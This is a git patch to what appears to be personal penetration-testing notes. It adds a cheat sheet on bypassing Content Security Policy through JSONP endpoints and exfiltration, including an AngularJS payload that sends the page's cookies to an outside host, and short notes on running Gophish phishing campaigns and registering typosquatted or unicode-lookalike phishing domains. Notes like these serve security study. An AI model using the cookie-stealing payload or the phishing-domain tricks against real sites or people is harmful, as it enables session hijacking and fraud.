From c328c604dddad38240a876eb9d299b422fa98535 Mon Sep 17 00:00:00 2001 From: whx Date: Fri, 12 Nov 2021 00:48:54 +0100 Subject: [PATCH] bump --- .gitmodules | 3 ++ exploit/web/content_security_policy/JSONBee | 1 + .../content_security_policy.md | 52 +++++++++++++++++++ osint/social_engineering/gophish.md | 12 +++++ osint/social_engineering/phishing_domain.md | 5 ++ 5 files changed, 73 insertions(+) create mode 160000 exploit/web/content_security_policy/JSONBee create mode 100644 exploit/web/content_security_policy/content_security_policy.md create mode 100644 osint/social_engineering/gophish.md create mode 100644 osint/social_engineering/phishing_domain.md diff --git a/.gitmodules b/.gitmodules index e09a84c..1981ec3 100644 --- a/.gitmodules +++ b/.gitmodules @@ -67,3 +67,6 @@ [submodule "forensics/volatility"] path = forensics/volatility url = https://github.com/volatilityfoundation/volatility.git +[submodule "exploit/web/content_security_policy/JSONBee"] + path = exploit/web/content_security_policy/JSONBee + url = https://github.com/zigoo0/JSONBee.git diff --git a/exploit/web/content_security_policy/JSONBee b/exploit/web/content_security_policy/JSONBee new file mode 160000 index 0000000..1a518dd --- /dev/null +++ b/exploit/web/content_security_policy/JSONBee @@ -0,0 +1 @@ +Subproject commit 1a518ddf695ae3093ff637c5958802715e890d88 diff --git a/exploit/web/content_security_policy/content_security_policy.md b/exploit/web/content_security_policy/content_security_policy.md new file mode 100644 index 0000000..9094c83 --- /dev/null +++ b/exploit/web/content_security_policy/content_security_policy.md @@ -0,0 +1,52 @@ +# Content Security Policy (CSP) + +* Either in HTTP header or inside DOM's HTML +* [CSP directives](https://content-security-policy.com/#directive) +* [CSP evaluator](https://csp-evaluator.withgoogle.com/) +* [Bypassing csp](https://blog.0daylabs.com/2016/09/09/bypassing-csp/) + +## Sources +* `*` wildcard +* `none` +* `self` for sources delivered through the same protocol + * `default-src 'self';` may not load any script +* `unsafe-inline` +* `unsafe-eval` +* `test.com` loads resources from domain but not subdomains +* `*.test.com` loads resources from subdomains +* `data:...` critical usage +* `nonce` loads if nonce is correct. `sha256`, `sha384`, `sha512` + * [style hasher](https://report-uri.com/home/hash) + +## Usage + +### JSONP +Find JSONP endpoints through which to use custom callback functions +* [JSONBee](https://github.com/zigoo0/JSONBee) +```sh +"> +``` + +### Misconfiguration +Insert payload into `src` attribute + +### Exfiltration +* [Beeceptor](beeceptor.com) +* Local webserver +* `connect-src` while Ajax/XHR requests are enabled +* Disguising as an `image-src` or `media-src` source +```html + +``` +other payloads +```sh + +``` +* +```sh + + +
+{{$on.curry.call().document.location='https:///' + $on.curry.call().document.cookie}} +
+``` diff --git a/osint/social_engineering/gophish.md b/osint/social_engineering/gophish.md new file mode 100644 index 0000000..9bc9ef0 --- /dev/null +++ b/osint/social_engineering/gophish.md @@ -0,0 +1,12 @@ +# Gophish + +* [Repo](https://github.com/gophish/gophish.git) + +## Usage + +* Create + * Send profile + * Landing page + * Email templates + * User groups + * New Campaign diff --git a/osint/social_engineering/phishing_domain.md b/osint/social_engineering/phishing_domain.md new file mode 100644 index 0000000..5ddf071 --- /dev/null +++ b/osint/social_engineering/phishing_domain.md @@ -0,0 +1,5 @@ +# Phishing Domains + +* Use an old, unused domain. +* Typosquatting, register a similar domain. +* Use similar looking chars from unicode.